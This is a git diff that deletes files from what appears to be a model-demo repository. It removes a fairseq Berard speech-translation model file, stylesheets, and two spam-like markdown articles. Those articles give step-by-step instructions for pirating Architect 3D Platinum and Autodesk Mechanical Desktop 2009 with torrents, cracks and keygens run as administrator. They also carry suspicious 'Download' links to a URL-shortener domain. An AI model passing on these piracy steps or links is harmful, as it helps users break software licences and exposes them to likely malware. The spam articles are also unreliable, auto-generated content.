(https://github.com/eske/seq2seq/blob/master/config/LibriSpeech/AST.yaml) - and the model code - (https://github.com/eske/seq2seq/blob/master/translate/models.py). - The encoder and decoder try to be close to the original implementation. - The attention is an MLP as in Bahdanau et al. - (https://arxiv.org/abs/1409.0473). - There is no state initialization by averaging the encoder outputs. - """ - - def __init__(self, encoder, decoder): - super().__init__(encoder, decoder) - - @staticmethod - def add_args(parser): - parser.add_argument( - "--input-layers", - type=str, - metavar="EXPR", - help="List of linear layer dimensions. 
These " - "layers are applied to the input features and " - "are followed by tanh and possibly dropout.", - ) - parser.add_argument( - "--dropout", - type=float, - metavar="D", - help="Dropout probability to use in the encoder/decoder. " - "Note that this parameters control dropout in various places, " - "there is no fine-grained control for dropout for embeddings " - "vs LSTM layers for example.", - ) - parser.add_argument( - "--in-channels", - type=int, - metavar="N", - help="Number of encoder input channels. " "Typically value is 1.", - ) - parser.add_argument( - "--conv-layers", - type=str, - metavar="EXPR", - help="List of conv layers " "(format: (channels, kernel, stride)).", - ) - parser.add_argument( - "--num-blstm-layers", - type=int, - metavar="N", - help="Number of encoder bi-LSTM layers.", - ) - parser.add_argument( - "--lstm-size", type=int, metavar="N", help="LSTM hidden size." - ) - parser.add_argument( - "--decoder-embed-dim", - type=int, - metavar="N", - help="Embedding dimension of the decoder target tokens.", - ) - parser.add_argument( - "--decoder-hidden-dim", - type=int, - metavar="N", - help="Decoder LSTM hidden dimension.", - ) - parser.add_argument( - "--decoder-num-layers", - type=int, - metavar="N", - help="Number of decoder LSTM layers.", - ) - parser.add_argument( - "--attention-dim", - type=int, - metavar="N", - help="Hidden layer dimension in MLP attention.", - ) - parser.add_argument( - "--output-layer-dim", - type=int, - metavar="N", - help="Hidden layer dim for linear layer prior to output projection.", - ) - parser.add_argument( - "--load-pretrained-encoder-from", - type=str, - metavar="STR", - help="model to take encoder weights from (for initialization)", - ) - parser.add_argument( - "--load-pretrained-decoder-from", - type=str, - metavar="STR", - help="model to take decoder weights from (for initialization)", - ) - - @classmethod - def build_encoder(cls, args, task): - encoder = BerardEncoder( - 
input_layers=literal_eval(args.input_layers), - conv_layers=literal_eval(args.conv_layers), - in_channels=args.input_channels, - input_feat_per_channel=args.input_feat_per_channel, - num_blstm_layers=args.num_blstm_layers, - lstm_size=args.lstm_size, - dropout=args.dropout, - ) - if getattr(args, "load_pretrained_encoder_from", None): - encoder = checkpoint_utils.load_pretrained_component_from_model( - component=encoder, checkpoint=args.load_pretrained_encoder_from - ) - return encoder - - @classmethod - def build_decoder(cls, args, task): - decoder = LSTMDecoder( - dictionary=task.target_dictionary, - embed_dim=args.decoder_embed_dim, - num_layers=args.decoder_num_layers, - hidden_size=args.decoder_hidden_dim, - dropout=args.dropout, - encoder_output_dim=2 * args.lstm_size, # bidirectional - attention_dim=args.attention_dim, - output_layer_dim=args.output_layer_dim, - ) - if getattr(args, "load_pretrained_decoder_from", None): - decoder = checkpoint_utils.load_pretrained_component_from_model( - component=decoder, checkpoint=args.load_pretrained_decoder_from - ) - return decoder - - @classmethod - def build_model(cls, args, task): - """Build a new model instance.""" - encoder = cls.build_encoder(args, task) - decoder = cls.build_decoder(args, task) - - return cls(encoder, decoder) - - def get_normalized_probs(self, net_output, log_probs, sample=None): - # net_output['encoder_out'] is a (B, T, D) tensor - lprobs = super().get_normalized_probs(net_output, log_probs, sample) - # lprobs is a (B, T, D) tensor - lprobs.batch_first = True - return lprobs - - -class BerardEncoder(FairseqEncoder): - def __init__( - self, - input_layers: List[int], - conv_layers: List[Tuple[int]], - in_channels: int, - input_feat_per_channel: int, - num_blstm_layers: int, - lstm_size: int, - dropout: float, - ): - """ - Args: - input_layers: list of linear layer dimensions. These layers are - applied to the input features and are followed by tanh and - possibly dropout. 
- conv_layers: list of conv2d layer configurations. A configuration is - a tuple (out_channels, conv_kernel_size, stride). - in_channels: number of input channels. - input_feat_per_channel: number of input features per channel. These - are speech features, typically 40 or 80. - num_blstm_layers: number of bidirectional LSTM layers. - lstm_size: size of the LSTM hidden (and cell) size. - dropout: dropout probability. Dropout can be applied after the - linear layers and LSTM layers but not to the convolutional - layers. - """ - super().__init__(None) - - self.input_layers = nn.ModuleList() - in_features = input_feat_per_channel - for out_features in input_layers: - if dropout > 0: - self.input_layers.append( - nn.Sequential( - nn.Linear(in_features, out_features), nn.Dropout(p=dropout) - ) - ) - else: - self.input_layers.append(nn.Linear(in_features, out_features)) - in_features = out_features - - self.in_channels = in_channels - self.input_dim = input_feat_per_channel - self.conv_kernel_sizes_and_strides = [] - self.conv_layers = nn.ModuleList() - lstm_input_dim = input_layers[-1] - for conv_layer in conv_layers: - out_channels, conv_kernel_size, conv_stride = conv_layer - self.conv_layers.append( - nn.Conv2d( - in_channels, - out_channels, - conv_kernel_size, - stride=conv_stride, - padding=conv_kernel_size // 2, - ) - ) - self.conv_kernel_sizes_and_strides.append((conv_kernel_size, conv_stride)) - in_channels = out_channels - lstm_input_dim //= conv_stride - - lstm_input_dim *= conv_layers[-1][0] - self.lstm_size = lstm_size - self.num_blstm_layers = num_blstm_layers - self.lstm = nn.LSTM( - input_size=lstm_input_dim, - hidden_size=lstm_size, - num_layers=num_blstm_layers, - dropout=dropout, - bidirectional=True, - ) - self.output_dim = 2 * lstm_size # bidirectional - if dropout > 0: - self.dropout = nn.Dropout(p=dropout) - else: - self.dropout = None - - def forward(self, src_tokens, src_lengths=None, **kwargs): - """ - Args - src_tokens: padded tensor (B, T, C * 
feat) - src_lengths: tensor of original lengths of input utterances (B,) - """ - bsz, max_seq_len, _ = src_tokens.size() - # (B, C, T, feat) - x = ( - src_tokens.view(bsz, max_seq_len, self.in_channels, self.input_dim) - .transpose(1, 2) - .contiguous() - ) - - for input_layer in self.input_layers: - x = input_layer(x) - x = torch.tanh(x) - - for conv_layer in self.conv_layers: - x = conv_layer(x) - - bsz, _, output_seq_len, _ = x.size() - - # (B, C, T, feat) -> (B, T, C, feat) -> (T, B, C, feat) -> - # (T, B, C * feat) - x = x.transpose(1, 2).transpose(0, 1).contiguous().view(output_seq_len, bsz, -1) - - input_lengths = src_lengths.clone() - for k, s in self.conv_kernel_sizes_and_strides: - p = k // 2 - input_lengths = (input_lengths.float() + 2 * p - k) / s + 1 - input_lengths = input_lengths.floor().long() - - packed_x = nn.utils.rnn.pack_padded_sequence(x, input_lengths) - - h0 = x.new(2 * self.num_blstm_layers, bsz, self.lstm_size).zero_() - c0 = x.new(2 * self.num_blstm_layers, bsz, self.lstm_size).zero_() - packed_outs, _ = self.lstm(packed_x, (h0, c0)) - - # unpack outputs and apply dropout - x, output_lengths = nn.utils.rnn.pad_packed_sequence(packed_outs) - if self.dropout is not None: - x = self.dropout(x) - - encoder_padding_mask = ( - lengths_to_padding_mask(output_lengths).to(src_tokens.device).t() - ) - - return { - "encoder_out": x, # (T, B, C) - "encoder_padding_mask": encoder_padding_mask, # (T, B) - } - - def reorder_encoder_out(self, encoder_out, new_order): - encoder_out["encoder_out"] = encoder_out["encoder_out"].index_select( - 1, new_order - ) - encoder_out["encoder_padding_mask"] = encoder_out[ - "encoder_padding_mask" - ].index_select(1, new_order) - return encoder_out - - -class MLPAttention(nn.Module): - """The original attention from Badhanau et al. (2014) - - https://arxiv.org/abs/1409.0473, based on a Multi-Layer Perceptron. 
- The attention score between position i in the encoder and position j in the - decoder is: alpha_ij = V_a * tanh(W_ae * enc_i + W_ad * dec_j + b_a) - """ - - def __init__(self, decoder_hidden_state_dim, context_dim, attention_dim): - super().__init__() - - self.context_dim = context_dim - self.attention_dim = attention_dim - # W_ae and b_a - self.encoder_proj = nn.Linear(context_dim, self.attention_dim, bias=True) - # W_ad - self.decoder_proj = nn.Linear( - decoder_hidden_state_dim, self.attention_dim, bias=False - ) - # V_a - self.to_scores = nn.Linear(self.attention_dim, 1, bias=False) - - def forward(self, decoder_state, source_hids, encoder_padding_mask): - """The expected input dimensions are: - decoder_state: bsz x decoder_hidden_state_dim - source_hids: src_len x bsz x context_dim - encoder_padding_mask: src_len x bsz - """ - src_len, bsz, _ = source_hids.size() - # (src_len*bsz) x context_dim (to feed through linear) - flat_source_hids = source_hids.view(-1, self.context_dim) - # (src_len*bsz) x attention_dim - encoder_component = self.encoder_proj(flat_source_hids) - # src_len x bsz x attention_dim - encoder_component = encoder_component.view(src_len, bsz, self.attention_dim) - # 1 x bsz x attention_dim - decoder_component = self.decoder_proj(decoder_state).unsqueeze(0) - # Sum with broadcasting and apply the non linearity - # src_len x bsz x attention_dim - hidden_att = torch.tanh( - (decoder_component + encoder_component).view(-1, self.attention_dim) - ) - # Project onto the reals to get attentions scores (src_len x bsz) - attn_scores = self.to_scores(hidden_att).view(src_len, bsz) - - # Mask + softmax (src_len x bsz) - if encoder_padding_mask is not None: - attn_scores = ( - attn_scores.float() - .masked_fill_(encoder_padding_mask, float("-inf")) - .type_as(attn_scores) - ) # FP16 support: cast to float and back - # srclen x bsz - normalized_masked_attn_scores = F.softmax(attn_scores, dim=0) - - # Sum weighted sources (bsz x context_dim) - 
attn_weighted_context = ( - source_hids * normalized_masked_attn_scores.unsqueeze(2) - ).sum(dim=0) - - return attn_weighted_context, normalized_masked_attn_scores - - -class LSTMDecoder(FairseqIncrementalDecoder): - def __init__( - self, - dictionary, - embed_dim, - num_layers, - hidden_size, - dropout, - encoder_output_dim, - attention_dim, - output_layer_dim, - ): - """ - Args: - dictionary: target text dictionary. - embed_dim: embedding dimension for target tokens. - num_layers: number of LSTM layers. - hidden_size: hidden size for LSTM layers. - dropout: dropout probability. Dropout can be applied to the - embeddings, the LSTM layers, and the context vector. - encoder_output_dim: encoder output dimension (hidden size of - encoder LSTM). - attention_dim: attention dimension for MLP attention. - output_layer_dim: size of the linear layer prior to output - projection. - """ - super().__init__(dictionary) - self.num_layers = num_layers - self.hidden_size = hidden_size - num_embeddings = len(dictionary) - padding_idx = dictionary.pad() - self.embed_tokens = nn.Embedding(num_embeddings, embed_dim, padding_idx) - if dropout > 0: - self.dropout = nn.Dropout(p=dropout) - else: - self.dropout = None - - self.layers = nn.ModuleList() - for layer_id in range(num_layers): - input_size = embed_dim if layer_id == 0 else encoder_output_dim - self.layers.append( - nn.LSTMCell(input_size=input_size, hidden_size=hidden_size) - ) - - self.context_dim = encoder_output_dim - self.attention = MLPAttention( - decoder_hidden_state_dim=hidden_size, - context_dim=encoder_output_dim, - attention_dim=attention_dim, - ) - - self.deep_output_layer = nn.Linear( - hidden_size + encoder_output_dim + embed_dim, output_layer_dim - ) - self.output_projection = nn.Linear(output_layer_dim, num_embeddings) - - def forward( - self, prev_output_tokens, encoder_out=None, incremental_state=None, **kwargs - ): - encoder_padding_mask = encoder_out["encoder_padding_mask"] - encoder_outs = 
encoder_out["encoder_out"] - - if incremental_state is not None: - prev_output_tokens = prev_output_tokens[:, -1:] - bsz, seqlen = prev_output_tokens.size() - - srclen = encoder_outs.size(0) - - # embed tokens - embeddings = self.embed_tokens(prev_output_tokens) - x = embeddings - if self.dropout is not None: - x = self.dropout(x) - - # B x T x C -> T x B x C - x = x.transpose(0, 1) - - # initialize previous states (or get from cache during incremental - # generation) - cached_state = utils.get_incremental_state( - self, incremental_state, "cached_state" - ) - if cached_state is not None: - prev_hiddens, prev_cells = cached_state - else: - prev_hiddens = [encoder_out["encoder_out"].mean(dim=0)] * self.num_layers - prev_cells = [x.new_zeros(bsz, self.hidden_size)] * self.num_layers - - attn_scores = x.new_zeros(bsz, srclen) - attention_outs = [] - outs = [] - for j in range(seqlen): - input = x[j, :, :] - attention_out = None - for i, layer in enumerate(self.layers): - # the previous state is one layer below except for the bottom - # layer where the previous state is the state emitted by the - # top layer - hidden, cell = layer( - input, - ( - prev_hiddens[(i - 1) % self.num_layers], - prev_cells[(i - 1) % self.num_layers], - ), - ) - if self.dropout is not None: - hidden = self.dropout(hidden) - prev_hiddens[i] = hidden - prev_cells[i] = cell - if attention_out is None: - attention_out, attn_scores = self.attention( - hidden, encoder_outs, encoder_padding_mask - ) - if self.dropout is not None: - attention_out = self.dropout(attention_out) - attention_outs.append(attention_out) - input = attention_out - - # collect the output of the top layer - outs.append(hidden) - - # cache previous states (no-op except during incremental generation) - utils.set_incremental_state( - self, incremental_state, "cached_state", (prev_hiddens, prev_cells) - ) - - # collect outputs across time steps - x = torch.cat(outs, dim=0).view(seqlen, bsz, self.hidden_size) - attention_outs_concat 
= torch.cat(attention_outs, dim=0).view( - seqlen, bsz, self.context_dim - ) - - # T x B x C -> B x T x C - x = x.transpose(0, 1) - attention_outs_concat = attention_outs_concat.transpose(0, 1) - - # concat LSTM output, attention output and embedding - # before output projection - x = torch.cat((x, attention_outs_concat, embeddings), dim=2) - x = self.deep_output_layer(x) - x = torch.tanh(x) - if self.dropout is not None: - x = self.dropout(x) - # project back to size of vocabulary - x = self.output_projection(x) - - # to return the full attn_scores tensor, we need to fix the decoder - # to account for subsampling input frames - # return x, attn_scores - return x, None - - def reorder_incremental_state(self, incremental_state, new_order): - super().reorder_incremental_state(incremental_state, new_order) - cached_state = utils.get_incremental_state( - self, incremental_state, "cached_state" - ) - if cached_state is None: - return - - def reorder_state(state): - if isinstance(state, list): - return [reorder_state(state_i) for state_i in state] - return state.index_select(0, new_order) - - new_state = tuple(map(reorder_state, cached_state)) - utils.set_incremental_state(self, incremental_state, "cached_state", new_state) - - -@register_model_architecture(model_name="s2t_berard", arch_name="s2t_berard") -def berard(args): - """The original version: "End-to-End Automatic Speech Translation of - Audiobooks" (https://arxiv.org/abs/1802.04200) - """ - args.input_layers = getattr(args, "input_layers", "[256, 128]") - args.conv_layers = getattr(args, "conv_layers", "[(16, 3, 2), (16, 3, 2)]") - args.num_blstm_layers = getattr(args, "num_blstm_layers", 3) - args.lstm_size = getattr(args, "lstm_size", 256) - args.dropout = getattr(args, "dropout", 0.2) - args.decoder_embed_dim = getattr(args, "decoder_embed_dim", 128) - args.decoder_num_layers = getattr(args, "decoder_num_layers", 2) - args.decoder_hidden_dim = getattr(args, "decoder_hidden_dim", 512) - args.attention_dim = 
getattr(args, "attention_dim", 512) - args.output_layer_dim = getattr(args, "output_layer_dim", 128) - args.load_pretrained_encoder_from = getattr( - args, "load_pretrained_encoder_from", None - ) - args.load_pretrained_decoder_from = getattr( - args, "load_pretrained_decoder_from", None - ) - - -@register_model_architecture(model_name="s2t_berard", arch_name="s2t_berard_256_3_3") -def berard_256_3_3(args): - """Used in - * "Harnessing Indirect Training Data for End-to-End Automatic Speech - Translation: Tricks of the Trade" (https://arxiv.org/abs/1909.06515) - * "CoVoST: A Diverse Multilingual Speech-To-Text Translation Corpus" - (https://arxiv.org/pdf/2002.01320.pdf) - * "Self-Supervised Representations Improve End-to-End Speech Translation" - (https://arxiv.org/abs/2006.12124) - """ - args.decoder_num_layers = getattr(args, "decoder_num_layers", 3) - berard(args) - - -@register_model_architecture(model_name="s2t_berard", arch_name="s2t_berard_512_3_2") -def berard_512_3_2(args): - args.num_blstm_layers = getattr(args, "num_blstm_layers", 3) - args.lstm_size = getattr(args, "lstm_size", 512) - args.dropout = getattr(args, "dropout", 0.3) - args.decoder_embed_dim = getattr(args, "decoder_embed_dim", 256) - args.decoder_num_layers = getattr(args, "decoder_num_layers", 2) - args.decoder_hidden_dim = getattr(args, "decoder_hidden_dim", 1024) - args.attention_dim = getattr(args, "attention_dim", 512) - args.output_layer_dim = getattr(args, "output_layer_dim", 256) - berard(args) - - -@register_model_architecture(model_name="s2t_berard", arch_name="s2t_berard_512_5_3") -def berard_512_5_3(args): - args.num_blstm_layers = getattr(args, "num_blstm_layers", 5) - args.lstm_size = getattr(args, "lstm_size", 512) - args.dropout = getattr(args, "dropout", 0.3) - args.decoder_embed_dim = getattr(args, "decoder_embed_dim", 256) - args.decoder_num_layers = getattr(args, "decoder_num_layers", 3) - args.decoder_hidden_dim = getattr(args, "decoder_hidden_dim", 1024) - 
args.attention_dim = getattr(args, "attention_dim", 512) - args.output_layer_dim = getattr(args, "output_layer_dim", 256) - berard(args) diff --git a/spaces/srishtiganguly/maskrcnn/style.css b/spaces/srishtiganguly/maskrcnn/style.css deleted file mode 100644 index 114adf441e9032febb46bc056b2a8bb651075f0d..0000000000000000000000000000000000000000 --- a/spaces/srishtiganguly/maskrcnn/style.css +++ /dev/null @@ -1,28 +0,0 @@ -body { - padding: 2rem; - font-family: -apple-system, BlinkMacSystemFont, "Arial", sans-serif; -} - -h1 { - font-size: 16px; - margin-top: 0; -} - -p { - color: rgb(107, 114, 128); - font-size: 15px; - margin-bottom: 10px; - margin-top: 5px; -} - -.card { - max-width: 620px; - margin: 0 auto; - padding: 16px; - border: 1px solid lightgray; - border-radius: 16px; -} - -.card p:last-child { - margin-bottom: 0; -} diff --git a/spaces/sssdtgvg/Sex/style.css b/spaces/sssdtgvg/Sex/style.css deleted file mode 100644 index 114adf441e9032febb46bc056b2a8bb651075f0d..0000000000000000000000000000000000000000 --- a/spaces/sssdtgvg/Sex/style.css +++ /dev/null @@ -1,28 +0,0 @@ -body { - padding: 2rem; - font-family: -apple-system, BlinkMacSystemFont, "Arial", sans-serif; -} - -h1 { - font-size: 16px; - margin-top: 0; -} - -p { - color: rgb(107, 114, 128); - font-size: 15px; - margin-bottom: 10px; - margin-top: 5px; -} - -.card { - max-width: 620px; - margin: 0 auto; - padding: 16px; - border: 1px solid lightgray; - border-radius: 16px; -} - -.card p:last-child { - margin-bottom: 0; -} diff --git a/spaces/stomexserde/gpt4-ui/Examples/Architect 3D Platinum 17.5.1.1000 (Serial-ECZ) [ChingLiu] Serial Key Keygen.md b/spaces/stomexserde/gpt4-ui/Examples/Architect 3D Platinum 17.5.1.1000 (Serial-ECZ) [ChingLiu] Serial Key Keygen.md deleted file mode 100644 index 1f26ae33470a2ed12b1f5ddc43b2139c750ba6ee..0000000000000000000000000000000000000000 --- a/spaces/stomexserde/gpt4-ui/Examples/Architect 3D Platinum 17.5.1.1000 (Serial-ECZ) [ChingLiu] Serial Key Keygen.md +++ 
/dev/null @@ -1,38 +0,0 @@ -
      -

      How to Download and Install Architect 3D Platinum 17.5.1.1000 for Free

      -

      If you are looking for a powerful and easy-to-use software to design your dream home, Architect 3D Platinum 17.5.1.1000 is the perfect choice. This software allows you to draw up plans, construct and view your house in 3D, personalize your interior and exterior, and create stunning 3D effects and virtual tours. You can also convert your 2D objects to 3D, rework from your scanned plans, and embed photographed objects with PhotoView™.

      -

      However, this software is not cheap. It costs 269,99 € on the official website[^2^]. But don't worry, there is a way to get it for free. All you need is a serial key and a keygen from ChingLiu.

      -

      Architect 3D Platinum 17.5.1.1000 (Serial-ECZ) [ChingLiu] Serial Key keygen


      Downloadhttps://urlgoal.com/2uIbtW



      -

      ChingLiu is a legendary file sharer who is known for cracking the toughest apps first, for doing it right, and for doing it often[^3^]. He has uploaded a torrent file of Architect 3D Platinum 17.5.1.1000 with a serial key and a keygen on The Pirate Bay. Here are the steps to download and install it:

      -
        -
      1. Go to The Pirate Bay and search for "Architect 3D Platinum 17.5.1.1000 (Serial-ECZ) [ChingLiu]".
      2. -
      3. Download the torrent file and open it with a torrent client such as uTorrent or BitTorrent.
      4. -
      5. Extract the files from the downloaded folder using WinRAR or 7-Zip.
      6. -
      7. Run the setup.exe file and follow the installation instructions.
      8. -
      9. When prompted, enter the serial key from the Serial.txt file.
      10. -
      11. After the installation is complete, do not run the program yet.
      12. -
      13. Copy the keygen.exe file from the Crack folder and paste it into the installation directory (usually C:\Program Files (x86)\Architecte 3D Platinum).
      14. -
      15. Run the keygen.exe file as administrator and click on Generate.
      16. -
      17. Copy the generated activation code and paste it into the program when asked.
      18. -
      19. Congratulations! You have successfully installed Architect 3D Platinum 17.5.1.1000 for free.
      20. -
      -

      Note: This method is for educational purposes only. We do not condone piracy or illegal downloading of software. Please support the developers by purchasing the software from their official website if you can afford it.

      Why Choose Architect 3D Platinum 17.5.1.1000?

      -

      Architect 3D Platinum 17.5.1.1000 is the ultimate solution for designing your dream home. Whether you are a beginner or a professional, you can use this software to create realistic and detailed plans of your house, garden, and swimming pool. You can also customize every aspect of your project, from the materials, colors, textures, furniture, lighting, and landscaping.

      -

      With Architect 3D Platinum 17.5.1.1000, you can also enjoy the following features:

      -
        -
      • A comprehensive library of over 8000 3D objects and textures to decorate your home.
      • -
      • A powerful 3D rendering engine that allows you to create stunning photorealistic images and videos of your project.
      • -
      • A swimming pool designer that lets you design your own pool shape, size, depth, and accessories.
      • -
      • A virtual tour mode that lets you explore your project in 3D from different angles and perspectives.
      • -
      • A PhotoView™ mode that lets you insert your own photos into your project and edit them with filters and effects.
      • -
      • A 2D/3D converter that lets you transform any 2D object into a 3D object with a simple click.
      • -
      • A scan plan mode that lets you import your scanned plans and trace over them with the software tools.
      • -
      -

      Architect 3D Platinum 17.5.1.1000 is compatible with Windows XP, Vista, 7, 8, and 10. It also supports the import and export of DXF/DWG files from AutoCAD® and SketchUp®.

      -

      How to Use Architect 3D Platinum 17.5.1.1000?

      -

      Using Architect 3D Platinum 17.5.1.1000 is easy and fun. You can start by choosing one of the pre-designed templates or creating your own from scratch. You can then draw the walls, doors, windows, stairs, roofs, and floors of your house using the intuitive tools and guides. You can also adjust the dimensions, angles, heights, and slopes of your elements with precision.

      -

      -

      Next, you can decorate your interior and exterior with the thousands of objects and textures available in the library. You can drag and drop them into your project and resize, rotate, and move them as you wish. You can also change the materials, colors, patterns, and styles of your objects to suit your taste.

      -

      Finally, you can view your project in 3D from different angles and perspectives. You can also create photorealistic images and videos of your project using the advanced rendering options. You can also take a virtual tour of your project in 3D and walk around it as if you were there. You can also insert your own photos into your project and edit them with PhotoView™.

      7196e7f11a
      -
      -
      \ No newline at end of file diff --git a/spaces/stomexserde/gpt4-ui/Examples/Autodesk Mechanical Desktop 2009 Keygen Rapidshare.md b/spaces/stomexserde/gpt4-ui/Examples/Autodesk Mechanical Desktop 2009 Keygen Rapidshare.md deleted file mode 100644 index 3933ece2367df2c6e46d85ebb121d293e7a1d505..0000000000000000000000000000000000000000 --- a/spaces/stomexserde/gpt4-ui/Examples/Autodesk Mechanical Desktop 2009 Keygen Rapidshare.md +++ /dev/null @@ -1,84 +0,0 @@ - -

      Autodesk Mechanical Desktop 2009 Keygen Rapidshare: What You Need to Know

      -

      If you are looking for a powerful and versatile software for mechanical design and engineering, you might have heard of Autodesk Mechanical Desktop 2009. This software is a part of the Autodesk Inventor suite, which provides a comprehensive solution for 3D mechanical design, simulation, documentation, and product data management. However, this software is not cheap, and you might be tempted to look for a free or cracked version online. One of the ways to do that is to use a keygen and download the software from Rapidshare. But what are the risks and benefits of doing that? In this article, we will explain everything you need to know about Autodesk Mechanical Desktop 2009 keygen Rapidshare, including what they are, how they work, and what are the pros and cons of using them.

      -

      Introduction

      -

      What is Autodesk Mechanical Desktop 2009?

      -

      Autodesk Mechanical Desktop 2009 is a software that helps you create and modify mechanical parts and assemblies in 2D and 3D. It allows you to design complex shapes, apply materials and textures, perform stress analysis, create drawings and bills of materials, and export your models to various formats. It also integrates with other Autodesk products, such as AutoCAD, Inventor, Vault, and Revit. Autodesk Mechanical Desktop 2009 is designed for professionals who need a high level of productivity and accuracy in their mechanical design projects.

      -

      Autodesk Mechanical Desktop 2009 Keygen Rapidshare


      Downloadhttps://urlgoal.com/2uIbhh



      -

      What is a keygen?

      -

      A keygen is a small program that generates serial keys or activation codes for software. A serial key is a unique combination of letters and numbers that identifies your copy of the software and allows you to use it legally. A keygen can help you bypass the registration or activation process of the software and use it for free. However, using a keygen is considered piracy and violates the terms of service and license agreement of the software. It can also expose your computer to malware, viruses, or legal actions.

      -

      What is Rapidshare?

      -

      Rapidshare is a file hosting service that allows users to upload and download files from its servers. It was one of the most popular file sharing platforms in the world until it shut down in 2015 due to legal issues and financial losses. Rapidshare was often used by people who wanted to share pirated or illegal content, such as movies, music, games, or software. However, downloading files from Rapidshare was not always safe or reliable, as they could be corrupted, infected, or removed at any time.

      -

      How to download and install Autodesk Mechanical Desktop 2009

      -

      System requirements

      -

      Before you download and install Autodesk Mechanical Desktop 2009, you need to make sure that your computer meets the minimum system requirements for the software. According to the official website, these are:

      -
        -
      • Operating system: Windows XP SP2 or Windows Vista
      • -
      • Processor: Intel Pentium 4 or AMD Athlon XP with SSE2 technology
      • -
      • Memory: 1 GB RAM (2 GB recommended)
      • -
      • Hard disk: 3 GB free space
      • -
      • Graphics: 128 MB DirectX 9.0c compatible graphics card with Shader Model 2.0 support
      • -
      • Display: 1024 x 768 resolution with True Color
      • -
      • Internet connection: for web downloads and activation
      • -
      -

      If your computer does not meet these requirements, you might experience problems or errors while running the software.

      -

      Download links

      -

      The official website of Autodesk does not offer any download links for Autodesk Mechanical Desktop 2009, as it is an outdated and discontinued product. The only way to get the software legally is to buy a license from an authorized reseller or a third-party website. However, these options are not cheap and might not be available in your region.

      -

      Alternatively, you can try to find a download link for Autodesk Mechanical Desktop 2009 on Rapidshare or other file sharing platforms. However, this is not recommended, as you might end up downloading a fake, corrupted, or infected file that could harm your computer or compromise your personal data. Moreover, downloading the software from Rapidshare is illegal and violates the intellectual property rights of Autodesk.

      -

      If you still want to take the risk and download Autodesk Mechanical Desktop 2009 from Rapidshare, you need to do some research and find a reliable and working link. You can use search engines, forums, blogs, or social media to look for reviews, comments, or feedback from other users who have tried the same link. You should also check the file size, format, and extension before downloading it. A typical file size for Autodesk Mechanical Desktop 2009 is around 1.5 GB, and the file format should be either ISO or RAR.

      -

      -

      Installation steps

      -

      Once you have downloaded the file from Rapidshare, you need to extract it using a program like WinRAR or 7-Zip. You should see a folder containing several files, including an ISO file and a keygen file. The ISO file is a disk image that contains the setup files for the software. The keygen file is a program that generates serial keys for the software.

      -

      To install Autodesk Mechanical Desktop 2009 from the ISO file, you need to mount it using a program like Daemon Tools or Virtual CloneDrive. This will create a virtual drive on your computer that will act as if you have inserted a CD or DVD. You can then open the virtual drive and run the setup.exe file to start the installation process.

      -

      The installation process is straightforward and similar to any other software installation. You just need to follow the instructions on the screen and choose the options that suit your preferences. However, when you are asked to enter a serial key or an activation code, you need to use the keygen file that you downloaded along with the ISO file.

      -

      How to use a keygen to activate Autodesk Mechanical Desktop 2009

      -

      What is a serial key and why do you need it?

      -

      A serial key is a unique combination of letters and numbers that identifies your copy of the software and allows you to use it legally. It is usually provided by the software developer or vendor when you purchase a license for the software. Without a valid serial key, you cannot activate or register the software, and you might face limitations or restrictions in its functionality.

      -

      How to find a working keygen for Autodesk Mechanical Desktop 2009

      -

      A keygen is a small program that generates serial keys or activation codes for software. A keygen can help you bypass the registration or activation process of the software and use it for free. However, using a keygen is considered piracy and violates the terms of service and license agreement of the software. It can also expose your computer to malware, viruses, or legal actions.

      -

      Finding a working keygen for Autodesk Mechanical Desktop 2009 is not easy, as most of them are fake, outdated, or infected. You need to do some research and find a reliable and working keygen that matches your version of the software. You can use search engines, forums, blogs, or social media to look for reviews, comments, or feedback from other users who have tried the same keygen. You should also check the file size, format, and extension before downloading it. A typical file size for a keygen is around 1 MB, and the file format should be either EXE or ZIP.

      -

      How to use the keygen to generate a serial key

      -

      To use the keygen to generate a serial key for Autodesk Mechanical Desktop 2009, you need to run it as an administrator on your computer. You should see a window with several options and buttons. You need to select your version of the software from the drop-down menu and click on the Generate button to generate a random serial key. You should see a series of letters and numbers in the text box. You need to copy this serial key and paste it in the installation window of the software when you are asked to enter it. You should also save this serial key somewhere safe, as you might need it later for verification or reinstallation.

      -

      How to enter the serial key and activate the software

      -

      To enter the serial key and activate Autodesk Mechanical Desktop 2009, you need to follow the installation steps until you reach the screen that asks you to enter a serial key or an activation code. You need to paste the serial key that you generated with the keygen in the text box and click on the Next button. The software will then verify your serial key and proceed with the installation. If your serial key is valid, you should see a message that says "Activation successful". If your serial key is invalid, you should see a message that says "Activation failed". In that case, you need to go back to the keygen and generate another serial key until you find one that works.

      -

      After you have activated the software, you can finish the installation and launch the software. You should be able to use all the features and functions of Autodesk Mechanical Desktop 2009 without any limitations or restrictions.

Pros and cons of using a keygen for Autodesk Mechanical Desktop 2009

Pros: free, easy, and fast

The main advantage of using a keygen for Autodesk Mechanical Desktop 2009 is that it allows you to use the software for free, without paying for a license or a subscription. This can save you a lot of money, especially if you are a student, a hobbyist, or a freelancer who cannot afford the official price of the software. Moreover, using a keygen is relatively easy and fast, as you only need to download, run, and copy-paste a few files and codes. You do not need to go through a complicated or lengthy registration or activation process.

Cons: illegal, risky, and unethical

The main disadvantage of using a keygen for Autodesk Mechanical Desktop 2009 is that it is illegal, risky, and unethical. By using a keygen, you are violating the intellectual property rights of Autodesk and breaking the terms of service and license agreement of the software. This can expose you to legal actions, fines, or penalties from Autodesk or other authorities. Moreover, using a keygen can be risky for your computer and your personal data, as you might download or run files that are infected with malware, viruses, or spyware. These can damage your system, steal your information, or compromise your security. Furthermore, using a keygen is unethical, as you are depriving Autodesk of its rightful revenue and undermining its efforts to develop and improve its products. You are also disrespecting the work and creativity of the developers and engineers who created the software.

Conclusion

Summary of the main points

In this article, we have explained everything you need to know about Autodesk Mechanical Desktop 2009 keygen Rapidshare, including what they are, how they work, and what the pros and cons of using them are. We have also provided some tips and steps on how to download, install, and activate Autodesk Mechanical Desktop 2009 using a keygen.

Recommendations and alternatives

While using a keygen for Autodesk Mechanical Desktop 2009 might seem tempting, we do not recommend it, as it is illegal, risky, and unethical. Instead, we suggest that you buy a legal license for the software from an authorized reseller or a third-party website. This way, you can support Autodesk and its products, enjoy all the benefits and features of the software, and avoid any problems or issues with your computer or your data.

If you cannot afford to buy a license for Autodesk Mechanical Desktop 2009, you can also look for alternatives that are free or cheaper than the original software. For example, you can try open-source or freeware programs that offer similar or comparable functions for mechanical design and engineering, such as FreeCAD, LibreCAD, Blender, or SketchUp. These programs are legal, safe, and ethical to use.

